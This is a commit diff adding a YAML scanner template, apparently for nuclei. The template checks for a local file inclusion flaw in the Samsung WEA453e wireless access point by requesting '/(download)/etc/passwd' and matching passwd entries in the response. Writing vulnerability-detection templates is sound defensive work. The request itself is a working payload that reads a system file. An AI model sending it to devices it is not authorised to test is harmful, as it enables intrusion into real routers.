Create samsung-wlan-ap-lfi.yaml
parent
eb50c32a64
commit
9daed142be
|
@ -0,0 +1,23 @@
|
|||
id: samsung-wlan-ap-lfi
|
||||
|
||||
info:
|
||||
name: Samsung Wlan AP (WEA453e) LFI
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/(download)/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[0*]:0:0"
|
||||
- "bin:[x]:1:1"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue